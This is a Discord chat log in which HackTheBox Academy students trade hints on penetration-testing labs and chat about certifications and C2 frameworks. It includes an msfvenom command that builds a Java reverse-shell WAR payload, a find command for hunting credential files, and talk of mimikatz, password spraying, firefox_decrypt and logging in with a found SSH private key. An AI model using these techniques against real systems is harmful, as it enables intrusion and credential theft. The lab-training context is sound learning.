actually didnt realize msfvenom had war output. Shoulda known though

I dont remember needing a war file for thay module, but my notes suck on that one so that could just be me

i will try that tommorow
but i should probably use something like this:
msfvenom -p java/shell_reverse_tcp lhost=10.10.0.1 lport=4321 -f war -o pwn.war
?

what wordlist were going to use for DNS subdomain enumeration under footprinting module

That's the fun part, figuring that out :D

hey im stuck with the medium lab on network enumeration academy, any hints?

i have no clue

can someone give me a hint on NOSQLi assessment 2 pls, i think it is SSJI ?

Can someone help me with the Footprinting Module > SMB section. Last question is elusive: What is the full system path of that specific share? I have run netshareenumall and netsharegetinfo. I understand the system is not Windows, so the C:\ path does not apply in this case. I must be running into a formatting issue or something because when I provide the full path, or what I believe is the full path, the answer is incorrect. I have tried ||\home\sambauser\sambashare||, ||\home\sambauser\sambashare||, ||/home/sambauser/sambashare||, ||/home/sambauser/sambashare/||, and a few other combos using ////blah//blah etc. Much appreciated.

Can aynone give me a nudge on AD Skills Assesment 2? Im completely lost here. I got the first flag, and I have a list of users. I have no idea how to find a password for another user. I cant run mimikatz cuz I dont have admin access to the first machine either. Ive tried password spraying too but that got me nowhere

Which question are you on?

4. Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

@graceful rampart Ok, give me one sec.

I'm DMing you.

Thanks

On the Password Attacks - Credential Hunting in Linux, does the -o ! -name "*.*" not search for any item?

If so why do we do the -name "*.txt" bit, would they not be found anyway?

Whole command is:

find /home/* -type f -name "*.txt" -o ! -name "*.*"

Feel free to DM me if you still need help

Incoming...

Feel free to DM me if you still need help

Has anyone managed to do the Credential Hunting in Linux question, without the hint?

I'm having trouble with the whatweb command, I'm not sure if I'm using it correctly, could someone please check?

I've curled the ip before running this

Thankyou will doo, i suspected as much but trusted the resources provided @>@

I'm on the public exploits module and can't seem to get this to run

Something strange is that it doesn't have an option to set my local host

Anyone around to assist with Foot Printing hard lab?

Which enumeration section are you on?

• i miss read. nevermind

no worries

[] 188.166.144.131:31611 - Trying to retrieve the wp_users table...
[-] Auxiliary aborted due to failure: unexpected-reply: No response or unexpected status code in response
[] Auxiliary module execution completed
????

😄

what exactly are you having trouble with? i haven't done any of the modules but i think i'm quite capable with msf

Alright so, I've found an exploit in a lower version of wordpress

I'm trying to use it in metasploit

to do this I need to configure the options on that specific exploits attack

but it doesn't have any option for me to put in a localhost and gives and error code when connecting

for me to put in a localhost
what do you mean by that?

options

info

in the module

it says you should be able to set an LHOST to tun0

Are you able to access it in a browser?

Yes

He means run the command show options and sned us a screenshot lol

looks like a different exploit

so does the options offer you to set LHOST?

Cant help much if we can see how you have the exploit configured

^

may not be a required field on this exploit

I guess but it still doesn't work when I run it lol

you set the vhost to tun0

thats very wrong

^

yeah 😄

uh ro

alright let me try to not do that hold on

likely need to be ip of tun0

Yeah lhost and vhost are 2 different things

for VHOST? 😄 not really 😄

nah, misread it

still doesn't seem to work

maybe I should reset machine ip

is the box still up, maybe it timed out?

yep 42 mins

"have you tried turning it on and off again?" 😄 not everything is windows 😄

but i'll try to reset machine maybe

true

curl -v ip:port?

@plush steppe

huh?

ok but how would that help it?

doing it now

maybe it will magic work

does that return any output?

unfortunate

there's your issue

😆

That does seem like an issue

it is a sad one

possibly vpn connection screwed itself over?

I gotta eat rq I'll bbs

vpn probably not required based on the address

Anyone around for a nudge on AD Enumeration & Attacks - Skills Assessment Part II? I cant really say much in here without spoiling.

It's academy though

i can't tell, i haven't done any modules myself

ping me, if you need further help

Docker targets afaik don't need the vpn

(it's not a 10.10.x.x so probably docker target)

Could I have a nudge on the Windows Priv - Kernel Exploits section

I have tried all 3 exploits

One of them I received an elevated meterpreter session, but I kept getting timeout errors

what does that mean? you get a session and you get a timeout at the same time? that's not making much sense

you should either get session or nothing at all

When I try to run commands in my meterpreer session I get timeouts

I swear, eery time i post that i need help i end up figuring it out almost right after lol

I can show the error

great technique 😄

lmao

Nice. You are making great progress on the AD module!

i get it

the point is likely something like that the session opens up and closes right away

Im almost done with it 🙃

Would I need to turn off AV?

as far as i know, AV is not enabled in most htb stuff

try doing some "command exec" first, like creating a file, reading root flag or so

Ive only ever seen it in 1 or 2 hard boxes. The rest were all insane machines

Its disabled 99% of the time

Credential Hunting Linux.

I've got ssh into the server, I think I've found the ||firefox default|| folder, but cannot get ||firefox_decrypt|| on the system. Am I on the right track?

Has anyone managed to get that on there?
I tried to do it offline with hashcat but I'm not sure hashcat supports it.

Any help greatly appreciated

really? i never seen it anywhere i think. I would probably kill my meterpreter instantly 😄

Its on a few insanse machines i think. I could be wrong tho

🤷‍♂️

not sure, i haven't done much insane win boxes 😄

probably like 1 😄

All i know about insane machines is what ive seen Alh4zr3d do lol

I havent done any insane machines myself

how come? 🙂 don't tell me you're scared 😄

No lol

just not confident I could complete them

altho im slowly getting more confident

cmon, just try it 😄

I will eventually

i've just taken a peek at sekmeth yesterday 😄

nice

getting back to this

I reset the machine, cleaned its ass

no work still

😦

curl -v ip:port?

alright

oh I also turned off vpn

Im tryna finish CPTS and then I wanna do RTO, and then maybe RTO2 and eventually Ill get back to doing malware developemnt

Ill get to the insane machines eventually

dafuq are those acronyms? 😄

yo it atleast does it this time

that's something

it curled yayy

options

CPTS is HTBs cert. RTO is the "Red Team Ops" course from zero point security, RTO2 is the follow up to that one

pretty nice, what's the RTO about?

is the ip/port correct?

More advanced red team tactics. You get to use cobalt strike too. RTO2 focuss on evasion

yes

info

]

😔

advanced

I plan to do zps certs after htb

man so many certs and i don't have any 😄

me too haha

wow doxxed my browser

😔

I'm actually not on windows

idk wtf it's talking about

set httptrace true

run

there's your issue 😄

might see it might not hold on

I have never seen this happen before

rip

huh? 😄 you get what's happening, right?

this is why i dont use meterpreter

Based

oh

HTTP/1.1 404 Not Found

?

Meterpreter is really cool to study and learn how it works but i dont like using it

oh do I need to install that lmfao

it would make sense

what do you prefer then? 😄

WHAT? 😄

Depends on my target, and my mood

jk

most of the time i end up using sliver. Recently ive been using havoc for windows targets

but at the same time I'm not sure how to config that

oh wait am I using wrong exploit

...

that's fairly possible

i'm not really familiar with anything else than msf, i don't do much of this in real world but like having actual session is tough as you get caught a lot of times by the AV

I liked smb delivery for meterpreter for some of the lab environments

😄

This

💯

yeah k so that exploit is only for http 1.1

Yes

but diving into other c2 frameworks is def on my todo list.

servers

Im gonna make my own eventually

at least thats the plan

its good practice at least

Yea

https://github.com/HavocFramework/Havoc this looks really cool 👀

Lol we already mentioned havoc

Yea it is

Knowing how to modify loaders/beacons/implants is massively valuable though.

i gotta try that on some htb stuff 😄

does it run on linux? 😄 can i use it only in terminal?

the prolabs are better environments for practicing c2

^

you really dont get much advantage out of em until youre managing multiple hosts with pivots

not if it get reset daily 😢

So with my timeout errors could that be a connection issue possibly? Do I just have shit wifi?

It has a GUI and everything. Yes you can run it on linux. Unless its been updated recently tho there are only windows payloads

most likely not

please mcshoot me

ok 😄

🙂

gotta really try it 😄

Then what would it be?

I am confused

it's probably just about the exploit running the command that you're giving it and terminating afterwards. If you really want an interactive session you need to work some way around that like adding an admin user or so

makes sense?

Yes

DO IT 😄

man, what's that single guy in the VC general chat doing 👀 😄 i've tried talking to him and he doesn't talk back 😄

WHERE THE FUCK DO I FIND THE CVE OF SOMETHING ON EXPLOITDB.com

kill me now

nvm doesn't even have one

i don't get what you're doing

oh now it works

ffs nvm

I want to mcshoot megasploit

solved? 🙂

Will get back to it soon. Taking a break

I'm doing https://academy.hackthebox.com/module/162/section/1534#questionsDiv and current stuck with this question about split panes vertically over a command. Any hints? I tried [Ctrl] + [B] + [Shift] + [%] (prefix + [Shift] + [%]) , but it doesn't accept my answer.

split panes? 😄 huh

what's the module about?

Documentation

Nevermind, I got it

yayy

ty for helping @high sentinel

hopefully you learned a bit about how to debug your own stuff

so you can do it on your own next time 🙂

fs

man these kids 😄 you just gotta type as little as possible 😄

it's gonna end up with just one character 😄

there's already W and L

wut? 😄

Yeah uhm "W is a popular term in sport and gaming. When someone simply puts a "W" in the comment section, it means they're saying "Win" or congratulating someone on their success. It's the opposite of someone taking an "L," which means to lose. Obviously."

💀

i dont get that

like i get the meaning but i don't get why would you do that

I know, it's very stupid lmao, younger kids are starting to use it though

where is this world even going? 😄

fair question, it's not

it's not? 😄

it's not going, it's swimming, right? 😄

AD Skills assesment 2 complete

That was a wild ride

By far the most fun I've had in a while

its an awesome module

#1 in my books

which Im confident saying even with only the last two modules left

Absolutley

Altho I am expecting attacking enterprise networks to be a fun challenege

hello excuse me <@&817153850845823057> i want to update my subscription but it couldnt why ?

"Please note, our payment processor is currently experiencing delays. If you made a purchase that is not yet reflected on your account, there is no need to reach out to support. It will be automatically reflected after a short delay period."

what does it mean?

i want to share the screenshot but i couldnt, is there permission for it?

It means that the company that processes payment information is having some difficulties; this isn't the place to ask these sorts of questions. The subscription, once purchased, should reflect after a few days.

it canceled because my balance is My account balance is not enough so it runs out which should be subscribed on January 5, now I want to top up the balance but after I subscribe it fails

any body knows maybe

If there is no balance, can there be a reduction in the balance without an agreement using a credit card?
Is it possible to continue renewing the subscription with a credit card with an insufficient balance?

<@&817153850845823057>

Oof

You're gonna get banned for that one

Did you seriously just ask if it's possible to renew a subscription with a credit card that has an insufficient balance?

@naive sky Please do not ping random roles to get support. Please use the chat bubble on the website. If you do not see a chat bubble, you will need to temporarily disable your adblocker..

i have seen it , but doesnt help to solve my problesm untill now

the transaction was succeded at first but for second not failed

Doesn't help, or you didn't wait for a response?

i have waited but untill now not solved

I got this what does it mean please?

"Please note, our payment processor is currently experiencing delays. If you made a purchase that is not yet reflected on your account, there is no need to reach out to support. It will be automatically reflected after a short delay period."

Exactly what it says.

Check your payment account. If the money didn't get withdrawn, it means wait for it to get withdrawn.

If it got withdrawn, it did what it was supposed to do.

I can't verify for some reason

my account is enough to do transaction but failed

Nothing failed. If the money hasn't been withdrawn yet it will be eventually

could i use paypal , but the paypal is forbidden 403 isnt?

and i havent seen option in billing payment option hackthebox academy

Madfox isnt here yet to ask the famous question? 😂

Can someone give me a little nudge for the privilege escalation module, what I have so far is this

||
user1@gettingstartedprivesc-589350-655b464765-xvtbb:/home/user2$ sudo -u user2 /bin/bash chmod 7 root/flag.txt
/usr/bin/chmod: /usr/bin/chmod: cannot execute binary file
basically what I'm trying to do is as user 1 use user 2's bin/bash sudo access to change the flag in root's permissions to let user2 access it as they can access root but I'm left with that sad error ||

That's too much work lol

Hint || sudo -l tells you all you need to know to escalate priv ||

^

Who do the sudo

wait what I have access to .ssh

💀

I might know what to do now

Yep always try the simple things first

uh

I have the || id_rsa and I'm trying to do ssh -i then the long ass key|| why would that not work?

it's very upset

@sly tapir

Has anyone got any tips for mounting a BitLocker .vhd without the UAC/admin prompt coming up? I've cracked the .vhd's hash and want to extract what's in it.

The key should be saved into a file like id_rsa with limited permissions, eg. chmod 600 id_rsa - you can then use it with ssh.

Did you follow along how they did in the lesson?

yeah but that makes it harder 😔

oh I guess I could just echo

Makes what harder?

connecting to ssh

I should be able to just have their key

and connect